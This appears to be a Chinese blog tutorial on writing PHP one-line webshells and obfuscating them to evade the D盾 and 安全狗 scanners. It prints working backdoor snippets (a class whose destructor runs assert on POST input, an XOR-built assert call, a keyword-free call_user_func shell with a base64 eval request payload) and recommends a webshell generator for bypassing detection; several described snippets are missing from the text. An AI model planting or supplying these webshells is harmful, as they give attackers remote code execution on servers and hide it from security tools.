PHP一句话花式免杀以及变种木马
此处为配图
0x01 前言
木马免杀一直是一个由来已久的话题,在攻防对抗的历史中,防御方规则越来越完善,木马也越来越精巧,我十分热衷这一技术,所以做一下记录。
经过筛选,决定拿最新版D盾作为验证工具,来验证木马是否免杀,之所以用D盾是因为D总更新频繁,每次更新都可以杀掉一大批免杀马,所以很给力。反面教材,当然就是安全狗了。
0x02 工具
D总的版本(开文最新版):
0x03 免杀姿势
关于eval 与 assert
关于eval函数
关于eval函数在php给出的官方说明是
eval 是一个语言构造器而不是一个函数,不能被可变函数调用。
可变函数:通过一个变量,获取其对应的变量值,然后通过给该值增加一个括号(),让系统认为该值是一个函数,从而当做函数来执行。
通俗的说比如你这样是不行的
也造就了用eval的话达不到assert的灵活,但是在php7.1以上assert已经不行了。原因是assert不能拆了。
关于assert函数
assert()回调函数(其实他应该叫断言函数)在构建自动测试套件的时候尤其有用,因为它们允许你简易地捕获传入断言的代码,并包含断言的位置信息。 当信息能够被其他方法捕获,使用断言可以让它更快更方便!
编写代码时,我们总是会做出一些假设,断言就是用于在代码中捕捉这些假设,可以将断言看作是异常处理的一种高级形式。程序员断言在程序中的某个特定点该的表达式值为真。如果该表达式为假,就中断操作。
可以在任何时候启用和禁用断言验证,因此可以在测试时启用断言,而在部署时禁用断言。
需要注意的是,使用assert函数作为木马,接收的值必须使用system()函数将命令包裹,末尾的分号可有可无。
比如:
字符串变形
字符串变形多数用于bypass安全狗,可能由于规则的原因,安全狗更加注重黑名单的字符串是否存在,一个特殊的变形就能绕过安全狗,PHP中有许多关于操作字符串的函数:
ucwords() //函数把字符串中每个单词的首字符转换为大写。
ucfirst() //函数把字符串中的首字符转换为大写。
trim() //函数从字符串的两端删除空白字符和其他预定义字符。
substr_replace() //函数把字符串的一部分替换为另一个字符串
substr() //函数返回字符串的一部分。
strtr() //函数转换字符串中特定的字符。
strtoupper() //函数把字符串转换为大写。
strtolower() //函数把字符串转换为小写。
strtok() //函数把字符串分割为更小的字符串
str_rot13() //函数对字符串执行 ROT13 编码。
比如使用substr_replace()函数将assert变形即可达到免杀的效果:
或者这样:
但是D总不答应,虽然显示是一级,但是看得懂php的一定知道这是什么
定义函数绕过
依然是将关键字拆分,但是这次我们使用自定义的函数
比如我们将assert和($_POST['x'])拆开
然而最新版的安全狗显然对assert这个关键字作了黑名单限制,所以bypass失败
回调函数
PHP的回调函数有许多
call_user_func_array()
call_user_func()
array_filter()
array_walk()
array_map()
registregister_shutdown_function()
register_tick_function()
filter_var()
filter_var_array()
uasort()
uksort()
array_reduce()
array_walk()
array_walk_recursive()
回调函数大部分已经被安全软件加入全家桶套餐 所以找到一个生僻的不常用的回调函数来执行 比如
这个马过狗是没问题的,但是依旧会被D总拎出来。
回调函数变形
虽然众多回调函数已经被加入豪华套餐,万一都被加入这条路肯定也走不通了,那么怎么绕过呢,我们只需要对其做个小小的变形,定义一个函数或者类来调用即可。
定义一个函数
虽然可以过狗,但是依旧会被D总拎出来,而且级别更高了
定义一个类
这个木马已经绕过了D盾的查杀,自定义的类使用构造函数将变量赋值给当前对象,然后调用了test函数将命令拼接。
数组
将执行代码放入数组中进行绕过
多维数组
$b = substr_replace("assexx","rt",4);
$a = array($arrayName = array('a' => $b($_POST['x'])));
?>
类
说到类肯定要搭配上魔术方法一起使用
class pure
{
public $a = '';
function __destruct(){
assert("$this->a");
}
}
$b = new pure;
$b->a = $_POST['x'];
?>
使用类将函数包裹,D盾对类的查杀较为弱。所以可以免杀
编码绕过
使用php的编码函数,或者使用异或等等简单的base64_decode
比如:
但是很遗憾被D盾秒了
应该属于特征木马被当作规则杀了。
异或
$a= ("!"^"@").'ssert';
$a($_POST[x]);
?>
$a($_POST[x])被当做了一条过滤规则。所以也会被杀
无字符特征马
利用POST包获取关键参数执行
例如
$decrpt = $_POST['x'];
$arrs = explode("|", $decrpt)[1];
$arrs = explode("|", base64_decode($arrs));
call_user_func($arrs[0],$arrs[1]);
?>
这个马就是免杀的。
这个马比较特殊,他没有将关键字放到木马,而是把接收的数据使用explode函数分割 为数组$arrs( $arrs [0]=>assert、 $arrs [1]=> eval(base64_decode($_POST[id])); 、 $arrs [2]=> &id=phpinfo(); )然后base64解密id参数 调用call_user_func回调函数来执行 ,此时assert是第一个参数,也就是被调用的回调函数, eval(base64_decode($_POST[id])); 是第二个参数,也就是回调函数assert的参数,最终会组成assert( eval(base64_decode($_POST[id])); )
所以格式为:
x=|YXNzZXJ0fGV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbaWRdKSk7|&id=cGhwaW5mbygpOw
也就是:x=|assert|eval(base64_decode($_POST[id]));|&id=phpinfo();
0x04 工具
这里推荐一款非常不错的过D盾,狗shell生成工具
https://github.com/yzddmr6/webshell-venom
该工具利用随机异或无限免杀D盾,效果一级棒。有空我会分析一下这个工具的原理。
0x05 结语
在php7.1后面我们已经不能使用强大的assert函数了,所以对于木马本身来说,扰乱和混淆将会变为主流。
参考:
